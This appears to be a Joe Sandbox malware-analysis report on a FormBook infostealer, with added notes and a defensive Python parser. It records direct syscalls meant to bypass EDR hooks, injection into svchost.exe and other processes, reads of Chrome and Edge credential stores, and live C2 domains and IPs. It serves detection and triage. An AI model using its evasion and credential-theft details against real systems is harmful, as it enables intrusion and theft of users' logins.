            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source for every entry below: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe. Each line is one Nt* call the sandbox saw issued directly, with the address it reports after "Direct from". If these calls really bypass the ntdll export stubs, inline hooks placed on those exports are not on the call path, which is why the report rates this as a likely EDR bypass; note that the set includes the injection primitives NtMapViewOfSection, NtWriteVirtualMemory, NtProtectVirtualMemory and NtResumeThread.
              NtResumeThread: Direct from: 0x773836AC
              NtMapViewOfSection: Direct from: 0x77382D1C
              NtWriteVirtualMemory: Direct from: 0x77382E3C
              NtProtectVirtualMemory: Direct from: 0x77382F9C
              NtSetInformationThread: Direct from: 0x773763F9
              NtCreateMutant: Direct from: 0x773835CC
              NtNotifyChangeKey: Direct from: 0x77383C2C
              NtSetInformationProcess: Direct from: 0x77382C5C
              NtCreateUserProcess: Direct from: 0x7738371C
              NtQueryInformationProcess: Direct from: 0x77382C26
              NtResumeThread: Direct from: 0x77382FBC
              NtWriteVirtualMemory: Direct from: 0x7738490C
              NtAllocateVirtualMemory: Direct from: 0x77383C9C
              NtReadFile: Direct from: 0x77382ADC
              NtAllocateVirtualMemory: Direct from: 0x77382BFC
              NtDelayExecution: Direct from: 0x77382DDC
              NtQuerySystemInformation: Direct from: 0x77382DFC
              NtOpenSection: Direct from: 0x77382E0C
              NtQueryVolumeInformationFile: Direct from: 0x77382F2C
              NtQuerySystemInformation: Direct from: 0x773848CC
              NtCreateKey: Direct from: 0x77382C6C
              NtReadVirtualMemory: Direct from: 0x77382E8C
              NtClose: Direct from: 0x77382B6C
              NtAllocateVirtualMemory: Direct from: 0x773848EC
              NtQueryAttributesFile: Direct from: 0x77382E6C
              NtSetInformationThread: Direct from: 0x77382B4C
              NtTerminateThread: Direct from: 0x77382FCC
              NtQueryInformationToken: Direct from: 0x77382CAC
              NtOpenKeyEx: Direct from: 0x77382B9C
              NtAllocateVirtualMemory: Direct from: 0x77382BEC
              NtDeviceIoControlFile: Direct from: 0x77382AEC
              NtCreateFile: Direct from: 0x77382FEC
              NtOpenFile: Direct from: 0x77382DCC
              NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 3060
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30B2008
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Note: the svchost.exe child is started with the sample's own path as its command line and is the same process that receives the execute-read-write section mapping and the memory write listed above; that pairing is what the "Maps a DLL or memory area into another process" and "Writes to foreign memory regions" signatures record, and svchost.exe then maps sections into URUrIrqwFu.exe and netbtugc.exe in turn.
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: jpdy1E8K4A.exe, URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: jpdy1E8K4A.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Note: every credential-store access is performed by netbtugc.exe, a binary the chain dropped into SysWOW64, not by the submitted sample; Login Data, Web Data and Cookies are the SQLite stores of Chrome and Edge, and Local State holds the DPAPI-wrapped key needed to decrypt them, so the four reads together are the complete browser-theft pattern rather than incidental file activity.
            Source: jpdy1E8K4A.exe | Binary or memory string: WIN_XP
            Source: jpdy1E8K4A.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: jpdy1E8K4A.exe | Binary or memory string: WIN_XPe
            Source: jpdy1E8K4A.exe | Binary or memory string: WIN_VISTA
            Source: jpdy1E8K4A.exe | Binary or memory string: WIN_7
            Source: jpdy1E8K4A.exe | Binary or memory string: WIN_8
            Note: the WIN_XP ... WIN_8 strings, the "AutoIt v3 GUI" window class and the key-name table (LWINDOWN, NUMPADENTER, ...) in the blob above are the AutoIt runtime's own string tables, which marks jpdy1E8K4A.exe as an AutoIt-compiled loader; the FormBook payload itself is what the Yara rules match in the unpacked svchost.exe image, not in the loader on disk.
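            The behaviour lines in this section and the preceding one (direct Nt* calls, execute-read-write section mappings and memory writes into other processes, the process creations, and the browser credential stores opened by netbtugc.exe) are exactly the evidence a triage script should pull out of a report like this one. The Python helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses a constructed subset of this report's own lines, tolerating the fused "...exeNtResumeThread" form and the trailing "Jump to behavior" link text, rebuilds the jpdy1E8K4A.exe -> svchost.exe -> URUrIrqwFu.exe -> netbtugc.exe -> firefox.exe chain from the cross-process primitives, and counts direct syscalls per caller. The regular expressions are assumptions about the report's line format, and the function names are the example's own.

```python
"""Triage helper for Joe Sandbox behaviour lines.

Added example (not part of the report or of Joe Sandbox): rebuilds the
process/injection chain and counts direct syscalls from the report's own
"Source: ..." lines.  The line-format regexes are assumptions, checked only
against the lines embedded below."""
import ntpath
import re
from collections import Counter, defaultdict

# Paths exactly as they appear in this report.
SAMPLE = r"C:\Users\user\Desktop\jpdy1E8K4A.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
DROPPED = (r"C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms"
           r"\URUrIrqwFu.exe")
NETBT = r"C:\Windows\SysWOW64\netbtugc.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
RWX = "execute and read and write"
LINK = "Jump to behavior"   # link text the page fuses onto most lines

# Constructed input: a subset of this report's behaviour lines, reproduced
# verbatim (source path fused to the action, trailing link text included).
LINES = [
    f"Source: {DROPPED}NtResumeThread: Direct from: 0x773836AC{LINK}",
    f"Source: {DROPPED}NtMapViewOfSection: Direct from: 0x77382D1C{LINK}",
    f"Source: {DROPPED}NtWriteVirtualMemory: Direct from: 0x77382E3C{LINK}",
    f"Source: {DROPPED}NtProtectVirtualMemory: Direct from: 0x77382F9C{LINK}",
    f"Source: {DROPPED}NtWriteVirtualMemory: Direct from: 0x7738490C{LINK}",
    f"Source: {SAMPLE}Section loaded: NULL target: {SVCHOST} protection: {RWX}{LINK}",
    f"Source: {SVCHOST}Section loaded: NULL target: {DROPPED} protection: {RWX}{LINK}",
    f"Source: {SVCHOST}Section loaded: NULL target: {NETBT} protection: {RWX}{LINK}",
    f"Source: {NETBT}Section loaded: NULL target: {FIREFOX} protection: read write{LINK}",
    f"Source: {NETBT}Section loaded: NULL target: {FIREFOX} protection: {RWX}{LINK}",
    f"Source: {NETBT}Thread register set: target process: 3060{LINK}",
    f"Source: {SAMPLE}Memory written: {SVCHOST} base: 30B2008{LINK}",
    f'Source: {SAMPLE}Process created: {SVCHOST} "{SAMPLE}"{LINK}',
    f'Source: {DROPPED}Process created: {NETBT} "{NETBT}"{LINK}',
    f'Source: {NETBT}Process created: {FIREFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"{LINK}',
    f"Source: {NETBT}File opened: C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data{LINK}",
    f"Source: {NETBT}File opened: C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data{LINK}",
]

# The source binary ends at the first ".exe"; the action may follow with no space.
SRC = r"^Source: (?P<src>.+?\.exe)\s*"
PATTERNS = {
    "syscall": re.compile(SRC + r"(?P<api>Nt\w+): Direct from: (?P<addr>0x[0-9A-Fa-f]+)"),
    "map": re.compile(SRC + r"Section loaded: NULL target: (?P<dst>.+?\.exe) protection: (?P<prot>[a-z ]+)"),
    "write": re.compile(SRC + r"Memory written: (?P<dst>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)"),
    "thread": re.compile(SRC + r"Thread register set: target process: (?P<pid>\d+)"),
    "spawn": re.compile(SRC + r'Process created: (?P<dst>.+?\.exe)(?: "|$)'),
    "file": re.compile(SRC + r"File opened: (?P<path>.+?)(?:" + LINK + r")?$"),
}


def parse(lines):
    """Bucket each line by primitive.  Returns per-caller syscall counts,
    cross-process edges (src, dst) -> set of primitives, thread-context
    writes per process, and the files each process opened."""
    out = {"syscalls": defaultdict(Counter), "edges": defaultdict(set),
           "thread_ctx": Counter(), "files": defaultdict(list)}
    for line in lines:
        for kind, pat in PATTERNS.items():
            m = pat.match(line)
            if not m:
                continue
            src = ntpath.basename(m["src"])   # ntpath: backslash paths on any host
            if kind == "syscall":
                out["syscalls"][src][m["api"]] += 1
            elif kind in ("map", "write", "spawn"):
                label = f"map:{m['prot']}" if kind == "map" else kind
                out["edges"][(src, ntpath.basename(m["dst"]))].add(label)
            elif kind == "thread":
                out["thread_ctx"][src] += 1
            else:  # file
                out["files"][src].append(m["path"])
            break
    return out


def chain(edges, root):
    """Processes reachable from root over spawn/map/write edges, in BFS order."""
    order, i = [root], 0
    while i < len(order):
        cur, i = order[i], i + 1
        for src, dst in sorted(edges):
            if src == cur and dst not in order:
                order.append(dst)
    return order


def rwx_injections(edges):
    """(src, dst) pairs where src mapped an RWX section into dst: the primitive
    behind the report's 'Maps a DLL or memory area into another process'."""
    return sorted(pair for pair, prims in edges.items() if f"map:{RWX}" in prims)


def credential_store_reads(files):
    """Processes that opened a browser 'Login Data' store, with the paths."""
    return {proc: [p for p in paths if p.endswith("Login Data")]
            for proc, paths in files.items() if any(p.endswith("Login Data") for p in paths)}


if __name__ == "__main__":
    r = parse(LINES)
    print("chain:", " -> ".join(chain(r["edges"], ntpath.basename(SAMPLE))))
    print("RWX section maps:", rwx_injections(r["edges"]))
    print("direct syscalls:", {k: dict(v) for k, v in r["syscalls"].items()})
    print("thread contexts set:", dict(r["thread_ctx"]))
    print("credential stores read:", credential_store_reads(r["files"]))
```

            Run as a script it prints the chain and the four RWX mappings; in a real pipeline the whole behaviour section is fed in instead of the embedded subset. The check worth keeping is rwx_injections: a section mapped execute-read-write from one process into another is the primitive the report's "Maps a DLL or memory area into another process" signature records, and a Windows system binary (svchost.exe here) receiving one from a file on the Desktop is a high-confidence injection indicator independent of the malware family.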

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
            MITRE ATT&CK matrix (rebuilt from the flattened grid). The leading digits are the report's count badges for the techniques it matched, kept as extracted; techniques listed without a count were not matched and are the matrix's standard placeholders.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 2 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 16 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1529045 | Sample: jpdy1E8K4A.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100

            Start (node 2)
              DNS/IP: www.woshop.online; www.tekilla.wtf; 19 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
              -> jpdy1E8K4A.exe (node 10, badge 1), started
                 Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                 -> svchost.exe (node 13), started
                    Signatures: Maps a DLL or memory area into another process
                    -> URUrIrqwFu.exe (node 16), injected
                       DNS/IP: www.nobartv6.website 103.224.182.242, ports 50025, 50026, 50027, TRELLIAN-AS-AP Trellian Pty Limited, AU, Australia; www.kexweb.top 63.250.47.40, ports 50004, 50005, 50006, NAMECHEAP-NET, US, United States; 8 other IPs or domains
                       Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                       -> netbtugc.exe (node 20, badge 13), started
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                          -> firefox.exe (node 23), started
Antivirus detection (submitted file)

Source | Detection | Scanner | Label | Link
jpdy1E8K4A.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook |
jpdy1E8K4A.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

URL reputation

Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529045
Start date and time: 2024-10-08 15:51:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: jpdy1E8K4A.exe (renamed because the original name is a hash value)
Original Sample Name: 64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@14/10
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 51
• Number of non-executed functions: 302
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 92.204.80.11
